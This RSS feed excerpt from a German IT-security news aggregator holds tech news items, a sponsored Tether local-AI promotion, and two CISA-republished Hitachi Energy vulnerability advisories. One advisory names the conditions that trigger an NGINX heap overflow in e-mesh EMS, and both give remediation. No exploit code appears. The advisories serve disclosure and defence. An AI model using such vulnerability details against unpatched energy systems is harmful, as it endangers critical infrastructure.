<description><![CDATA[Wild Hornets is using cheap 3D printing to expand drone production, reduce costs and reduce third-party reliance amidst evolving military threats.]]></description>
<link>https://tsecurity.de/de/3652798/it-nachrichten/anonymous-wild-hornets-spokesperson-calls-drone-swarms-a-fun-legend-and-a-scam-mechanism-as-he-defends-the-critical-importance-of-3d-printers-in-warfare/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652798/it-nachrichten/anonymous-wild-hornets-spokesperson-calls-drone-swarms-a-fun-legend-and-a-scam-mechanism-as-he-defends-the-critical-importance-of-3d-printers-in-warfare/</guid>
<pubDate>Tue, 07 Jul 2026 23:32:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wild Hornets is using cheap 3D printing to expand drone production, reduce costs and reduce third-party reliance amidst evolving military threats.]]></content:encoded>
</item>
<item>
<title><![CDATA[Copilot goes cheap as Microsoft phases out OpenAI and Anthropic models to cut costs]]></title>
<description><![CDATA[Microsoft is replacing AI models from OpenAI and Anthropic with its own MAI models in products like Excel and Outlook. Tens of thousands of queries per week already run through them. AI chief Mustafa Suleyman wants to "ultimately eliminate" the cost of external models. For Copilot customers, that...]]></description>
<link>https://tsecurity.de/de/3652551/ai-nachrichten/copilot-goes-cheap-as-microsoft-phases-out-openai-and-anthropic-models-to-cut-costs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652551/ai-nachrichten/copilot-goes-cheap-as-microsoft-phases-out-openai-and-anthropic-models-to-cut-costs/</guid>
<pubDate>Tue, 07 Jul 2026 20:52:04 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1376" height="768" src="https://the-decoder.com/wp-content/uploads/2026/07/microsoft_coopilot.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        Microsoft is replacing AI models from OpenAI and Anthropic with its own MAI models in products like Excel and Outlook. Tens of thousands of queries per week already run through them. AI chief Mustafa Suleyman wants to "ultimately eliminate" the cost of external models. For Copilot customers, that could mean less performance for the same price.</p>
<p>The article <a href="https://the-decoder.com/copilot-goes-cheap-as-microsoft-phases-out-openai-and-anthropic-models-to-cut-costs/">Copilot goes cheap as Microsoft phases out OpenAI and Anthropic models to cut costs</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hitachi Energy PROMOD V]]></title>
<description><![CDATA[View CSAF
Summary
Hitachi Energy is aware of insecure HTTP transmission vulnerability in PROMOD V product versions listed in this document. This vulnerability could allow attackers to intercept or manipulate sensitive data in transit, potentially leading to credential theft, session hijacking, or...]]></description>
<link>https://tsecurity.de/de/3652272/it-security-nachrichten/hitachi-energy-promod-v/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652272/it-security-nachrichten/hitachi-energy-promod-v/</guid>
<pubDate>Tue, 07 Jul 2026 18:55:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-188-02.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Hitachi Energy is aware of insecure HTTP transmission vulnerability in PROMOD V product versions listed in this document. This vulnerability could allow attackers to intercept or manipulate sensitive data in transit, potentially leading to credential theft, session hijacking, or unauthorized access.</strong></p>
<p>The following versions of Hitachi Energy PROMOD V are affected:</p>
<ul>
<li>PROMOD V vers:PROMOD_V/&lt;=1.0.10</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 7.1</td>
<td>Hitachi Energy</td>
<td>Hitachi Energy PROMOD V</td>
<td>Reliance on HTTP instead of HTTPS</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Energy</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Switzerland</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-10763</a></h3>
<div class="csaf-accordion-content">
<p>PROMOD V is using insecure HTTP communication instead of HTTPS. The vulnerability is due to the lack of HTTPS support from 3rd party Digipede server.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-10763">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Hitachi Energy PROMOD V</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Hitachi Energy</div>
<div class="ics-version"><strong>Product Version:</strong><br>PROMOD V versions 1.0.10 and prior</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Upgrade to version 1.0.11 and enable HTTPS on Digipede server. [2] Refer to “1.0.11 PROMOD V User Guide”, Section 2 Essential Skills-&gt;Running PROMOD V-&gt;Digipede Grid. Alternatively, refer to the same section in the online help contained in the application.</p>
<p><strong>Mitigation</strong><br>Apply general mitigation factors</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1428.html">CWE-1428 Reliance on HTTP instead of HTTPS</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N</a></td>
</tr>
<tr>
<td>4.0</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Hitachi Energy Internal Team</li>
</ul>
<hr>
<h2>Notice</h2>
<p>The information in this document is subject to change without notice and should not be construed as a commitment by Hitachi Energy. Hitachi Energy provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall Hitachi Energy or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if Hitachi Energy or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from Hitachi Energy and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.</p>
<hr>
<h2>Support</h2>
<p>For additional information and support please contact your product provider or Hitachi Energy service organization. For contact information, see https://www.hitachienergy.com/contact-us/ for Hitachi Energy contact-centers.</p>
<hr>
<h2>General Mitigation Factors</h2>
<p>Recommended security practices and firewall configurations can help protect a process control network from attacks that originate from outside the network. Such practices include that process control systems are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that have to be evaluated case by case. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system. Proper password policies and processes should be followed. Additional information on Industrial Control Systems Cybersecurity Best Practices can be found in the Hitachi Energy “Industrial Control Systems Cybersecurity Best Practices” Cybersecurity Notification. [1]</p>
<hr>
<h2>SSVC</h2>
<p>SSVCv2/E:N/A:N/2026-06-29T12:01:59Z/</p>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities.</p>
<p>Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolate them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<hr>
<h2>Advisory Conversion Disclaimer</h2>
<p>This ICSA is a verbatim republication of Hitachi Energy PSIRT 8DBD000250 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Hitachi Energy PSIRT directly for any questions regarding this advisory.</p>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-06-30</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-06-30</td>
<td>1</td>
<td>Initial public release</td>
</tr>
<tr>
<td>2026-07-07</td>
<td>2</td>
<td>Initial CISA Republication of Hitachi Energy PSIRT 8DBD000250 advisory</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hitachi Energy e-mesh EMS]]></title>
<description><![CDATA[View CSAF
Summary
Hitachi Energy is aware of a buffer overflow vulnerability that affects e-mesh EMS product versions listed in this document. Successful exploitation of this vulnerability could lead to a buffer overflow condition, potentially resulting in application outages (denial of service) ...]]></description>
<link>https://tsecurity.de/de/3652268/it-security-nachrichten/hitachi-energy-e-mesh-ems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652268/it-security-nachrichten/hitachi-energy-e-mesh-ems/</guid>
<pubDate>Tue, 07 Jul 2026 18:55:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-188-03.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Hitachi Energy is aware of a buffer overflow vulnerability that affects e-mesh EMS product versions listed in this document. Successful exploitation of this vulnerability could lead to a buffer overflow condition, potentially resulting in application outages (denial of service) and possible arbitrary code execution. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation.</strong></p>
<p>The following versions of Hitachi Energy e-mesh EMS are affected:</p>
<ul>
<li>Hitachi Energy e-mesh EMS 4.1.6, 4.4.2, 4.7.0</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 8.1</td>
<td>Hitachi Energy</td>
<td>Hitachi Energy e-mesh EMS</td>
<td>Heap-based Buffer Overflow</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Energy</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Switzerland</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-42945</a></h3>
<div class="csaf-accordion-content">
<p>NGINX Plus and NGINX Open Source used in e-mesh EMS have a vulnerability in the ngx_http_rewrite_module module. This vulnerability exists when the rewrite directive is followed by a rewrite, if, or set directive and an unnamed Perl-Compatible Regular Expression (PCRE) capture (for example, $1, $2) with a replacement string that includes a question mark (?). An unauthenticated attacker along with conditions beyond its control can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, attackers can execute code on systems with Address Space Layout Randomization (ASLR) disabled or when the attacker can bypass ASLR. e-mesh EMS versions using NGINX v1.30.0 and below are affected.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-42945">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Hitachi Energy e-mesh EMS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Hitachi Energy</div>
<div class="ics-version"><strong>Product Version:</strong><br>e-mesh EMS versions 4.1.6, e-mesh EMS versions 4.4.2, e-mesh EMS versions 4.7.0</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Apply hotfix for respective e-mesh EMS versions to update NGINX to either v1.30.2 or latest</p>
<p><strong>Mitigation</strong><br>Ensure rewrite configuration does not contain "?" to replace unnamed captures, and ensure ASLR is set to active (value=2) across all deployment targets covering all 3 versions.</p>
<p><strong>Mitigation</strong><br>Underlying Ubuntu Server 20.04 LTS is End of Life. For e-mesh EMS versions 4.1.6/4.4.2 using Ubuntu 20.04 LTS, upgrade to Ubuntu Server 22.04, or 24.04, or activate Ubuntu Pro/ESM as an interim measure.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/122.html">CWE-122 Heap-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>9.2</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Hitachi Energy Internal Team</li>
</ul>
<hr>
<h2>Notice</h2>
<p>The information in this document is subject to change without notice and should not be construed as a commitment by Hitachi Energy. Hitachi Energy provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall Hitachi Energy or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if Hitachi Energy or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from Hitachi Energy and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.</p>
<hr>
<h2>Support</h2>
<p>For additional information and support please contact your product provider or Hitachi Energy service organization. For contact information, see https://www.hitachienergy.com/contact-us/ for Hitachi Energy contact-centers.</p>
<hr>
<h2>General Mitigation Factors</h2>
<p>Recommended security practices and firewall configurations can help protect a process control network from attacks that originate from outside the network. Such practices include that process control systems are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that have to be evaluated case by case. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system. Proper password policies and processes should be followed. Additional information on Industrial Control Systems Cybersecurity Best Practices can be found in the Hitachi Energy “Industrial Control Systems Cybersecurity Best Practices” Cybersecurity Notification. [1]</p>
<hr>
<h2>SSVC</h2>
<p>SSVCv2/E:N/A:N/2026-06-29T17:00:59Z/</p>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities.</p>
<p>Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolate them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<hr>
<h2>Advisory Conversion Disclaimer</h2>
<p>This ICSA is a verbatim republication of Hitachi Energy PSIRT 8DBD000253 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Hitachi Energy PSIRT directly for any questions regarding this advisory.</p>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-06-30</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-06-30</td>
<td>1</td>
<td>Initial public release</td>
</tr>
<tr>
<td>2026-07-07</td>
<td>2</td>
<td>Initial CISA Republication of Hitachi Energy PSIRT 8DBD000253 advisory</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tether believes intelligence should not be a service people rent]]></title>
<description><![CDATA[The world is advancing toward a future in which over 10 billion humans coexist with trillions of autonomous agents in a superintelligent universe. However, the cloud-hosted systems that currently dominate AI’s operational models lack the architectural elasticity to support this growing demand for...]]></description>
<link>https://tsecurity.de/de/3652244/it-nachrichten/tether-believes-intelligence-should-not-be-a-service-people-rent/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652244/it-nachrichten/tether-believes-intelligence-should-not-be-a-service-people-rent/</guid>
<pubDate>Tue, 07 Jul 2026 18:49:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The world is advancing toward a future in which over 10 billion humans coexist with trillions of autonomous agents in a superintelligent universe. However, the cloud-hosted systems that currently dominate AI’s operational models lack the architectural elasticity to support this growing demand for compute resources. Championed by managed GPU Clusters and centralized data centers, cloud AI relies on infrastructure that expands the operational scope of AI, requiring users to literally “rent” intelligence or the tools to develop it.</p>



<p>Tether argues that this system has a weak advantage, similar to scaling a database by simply buying a bigger server. AI scaling, in contrast, amplifies intelligence and availability. Cloud-hosted AI falters in both cases. Infinite scalability and universality in AI are therefore driven by the ability to deploy intelligent systems in any environment using readily available toolsets.</p>



<p>Tether’s AI research and development team believes that this “ability” is inherent in edge-optimized, local AI: self-hosted infrastructure for AI inference, training, and development on user-grade devices. Essentially, local AI converts intelligence into a portable capital asset readily available to the user, rather than a rented utility, as with cloud-hosted AI.</p>



<h2 class="wp-block-heading">Operational constraints for AI developers and businesses.</h2>



<p>Over 4,200 (43% of the <a href="https://www.datacentermap.com/datacenters/" target="_blank" rel="sponsored">world’s</a> data centers) are located in the United States; eight times more than second-placed UK and third-placed Germany, which hosts more than twice as many data centers as all of Africa. This availability bias cuts across several other core infrastructure for AI development and routine use, impacting cost-effectiveness, performance, and data sovereignty.</p>



<p>Furthermore, data centers and other AI infrastructure, swamped with resource demands from unicorns and AI startups, continually adjust rental fees to offset operating costs and generate revenue. By extension, the high capital expenditure (CapEx) required for AI infrastructure is forcing companies to restructure their balance sheets. Major AI companies are expected to spend <a href="https://www.goldmansachs.com/insights/articles/why-ai-companies-may-invest-more-than-500-billion-in-2026" target="_blank" rel="sponsored">$500 billion</a> on capital costs this year, a 30% increase from 2025 records. This is projected to reach $<a href="https://www.investing.com/news/stock-market-news/ai-capex-to-exceed-half-a-trillion-in-2026-ubs-4343520" target="_blank" rel="sponsored">1.3 trillion by 2030</a>, growing at 25% per annum.</p>



<p>Beyond availability and cost-efficacy, reliance on third-party infrastructure introduces additional operational factors and points of failure. Unplanned outages and abrupt changes in usage terms could significantly affect developers and end users.</p>



<p>In contrast, local AI operates autonomously, runs on infrastructure available to everyone, and works on any system. Plainly, they are agnostic, run on-premise, and eliminate barriers to availability.</p>



<h2 class="wp-block-heading">Reputation capital of centralized AI</h2>



<p>In an ideal scenario, anyone should be able to confidently use AI tools without worrying about what happens to their data post-execution. However, third-party access to user data opens channels for data mismanagement, this time, more advanced due to the quality of data unintentionally supplied by users during model training, fine-tuning, and inference.</p>



<p>34% of cybersecurity leaders <a href="https://www.statista.com/chart/35663/main-cybersecurity-concerns-related-to-ai/" target="_blank" rel="sponsored">identified</a> “data leaks through generative AI” as their top concern for 2026, surpassing hacker capabilities for the first time. Elsewhere, the majority of the <a href="https://www.bitsight.com/underground/data-breaches" target="_blank" rel="sponsored">670 data breach</a> incidents reported in the first quarter of 2026 are either directly AI-driven or involve centralized data management infrastructure.</p>



<p>“Third-party” in this context includes AI companies and as-a-service infrastructure providers contracted to serve as a liaison between AI tools and users. Tens of the former are already headed to court in <a href="https://www.mckoolsmith.com/newsroom-ailitigation" target="_blank" rel="sponsored">major class-action lawsuits</a> over the handling of user data.</p>



<p>Local AI positions users as the only control point. User data is stored on-device and managed by software that has zero contact with external systems.</p>



<p>Tether AI’s research and development focuses on advancing machine intelligence as a readily available utility worldwide through technologies that let anyone build or use AI tools anywhere.</p>



<h2 class="wp-block-heading">Universality for superintelligence and agnostic, on-premise AI.</h2>



<p>Tether believes that efficient, self-hosted AI can transform machine intelligence into a new element of the periodic table that powers new possibilities in dynamic systems. This (self-hosted AI) will set in a new paradigm in which superintelligence is a foundational element owned by the user. However, effective agnostic, on-premise AI can only be achieved through creative engineering. This includes modifications from the model level to the complete architecture that accommodate design differences. Tether is leading innovations in pursuit of this. It is also contributing to open-source efforts to localize AI and abstract its complexities. This expands opportunities for even more advancements in local and edge-first AI.</p>



<p>The idea is to decouple AI from the current siloed, controlled, and fragile model. Tether is re-engineering Artificial Intelligence and modifying existing technologies to achieve infinite, scalable intelligence.</p>



<p>The first task here is to build a base infrastructure that operates as a self-governed unit. To this end, Tether developed the <a href="https://pears.com/" target="_blank" rel="sponsored">Pear runtime</a> and co-founded <a href="https://holepunch.to/" target="_blank" rel="sponsored">Holepunch</a>. Pear Runtime and Holepunch employ decentralized resource networks, databases, and communication protocols to achieve a serverless P2P backend for edge applications.</p>



<p>Next, Tether addresses the heavy computational overhead of AI models by developing resource-efficient models and infrastructure that run locally on user-grade devices and across heterogeneous environments. It launched QVAC (QuantumVerse Automatic Computer), an AI research team, and a development framework for local-first and edge-first AI research and development.</p>



<p>This unit has led the development of:</p>



<ul class="wp-block-list">
<li>A fine-tuning framework for Bitnet’s 13-billion-parameter LLM on regular devices, bypassing the GPU limitations of the ternary quantized model</li>



<li><a href="https://qvac.tether.io/dev/fabric/" target="_blank" rel="sponsored">QVAC Fabric LLM</a>: A high-throughput local-first AI framework that transforms regular devices into sovereign compute machines for AI development, model training, and inference.</li>



<li>An Edge-first Parameter-efficient fine-tuning framework for training the QVAC Fabric LLM locally on everyday devices and heterogeneous GPUs</li>
</ul>



<p>Building on the QVAC framework, Tether’s AI coverage has expanded to include tools for deploying intelligence across diverse systems, from personal computers to interfaces for controlling smart homes and appliances. This includes runtime environments, training data, fine-tuning frameworks, and edge-optimized AI applications.</p>



<p>Tether has built a suite of tools that put local AI into practice across every layer of the stack, including:</p>



<ul class="wp-block-list">
<li><a href="https://qvac.tether.io/dev/genesis/" target="_blank" rel="sponsored">QVAC Genesis</a> I &amp; II: Synthetic datasets for training AI models on STEM disciplines.</li>



<li><a href="https://docs.wdk.tether.io/" target="_blank" rel="sponsored">WDK</a>: AI-ready wallet development framework that enables autonomous agents to build local and edge-first cryptocurrency wallets.</li>



<li><a href="https://qvac.tether.io/models/" target="_blank" rel="sponsored">QVAC MedPsy</a>: A range of (1.7B and 4B parameter) local-first medical AI models that run on heterogeneous everyday devices and produce more accurate and precise results than some larger medical AI models.</li>



<li><a href="https://qv.ac/" target="_blank" rel="sponsored">QVAC Workbench</a>: A unique general-purpose AI tool for researching, coding, and execution on edge devices.</li>
</ul>



<p>Developers equipped with these can implement local AI integrations across diverse systems through a serverless backend, models that can run on resource-limited systems, and UI modules that simplify usage. This is further reinforced by the <a href="https://qvac.tether.io/dev/sdk/" target="_blank" rel="sponsored">QVAC SDK</a>, which consolidates all of Tether’s AI-related achievements to date. QVAC SDK is a toolkit of prebuilt modules for components of the QVAC AI infrastructures. It provides usage guides, integration contexts, and functional samples. This enables developers to build intelligent on-premises applications for any system without requiring permissions.</p>



<h2 class="wp-block-heading">Committing to a human-centric future for AI</h2>



<p>Artificial intelligence is arguably the most human-targeted internet-based technology in history. In an AI-dominated future, the current user base will be only a fraction of the demand scale. However, Institutional capital expenditure capacity isn’t unlimited, and the bloat in rental costs has no ceiling.</p>



<p>Tether’s local-first approach to AI acknowledges the relevance of machine intelligence to humans and its deep connection to everyday life. In response, it is dedicated to developing a universally accessible AI that is modular enough to be embedded in the fabric of any device, system, or environment. This ranges from industrial servers to the smallest chip in a light bulb. </p>



<p>In all of these cases, the ‘users’ own their AI, can build on their own terms, without permission or external constraints, choose their own biases, and control how their data is used. Practically, this is the only way to ensure that superintelligence is successfully delivered to the billions of humans it is meant for. </p>



<p><strong>Subscribe to the </strong><a href="https://qvac.tether.io/newsletter/" target="_blank" rel="sponsored"><strong>QVAC newsletter</strong></a><strong> to learn more about Tether’s breakthroughs in AI</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Q&A: Solving Synthetic Media Challenges Before All Trust is Lost]]></title>
<description><![CDATA[Synthetic media has moved from technical curiosity to mainstream threat in just a few years, with deepfakes now cheap enough to produce that a free app and a handful of seconds of scraped audio can generate convincing fakes. The consequences stretch well beyond political misinformation: corporate...]]></description>
<link>https://tsecurity.de/de/3652148/it-security-nachrichten/qa-solving-synthetic-media-challenges-before-all-trust-is-lost/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652148/it-security-nachrichten/qa-solving-synthetic-media-challenges-before-all-trust-is-lost/</guid>
<pubDate>Tue, 07 Jul 2026 18:25:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
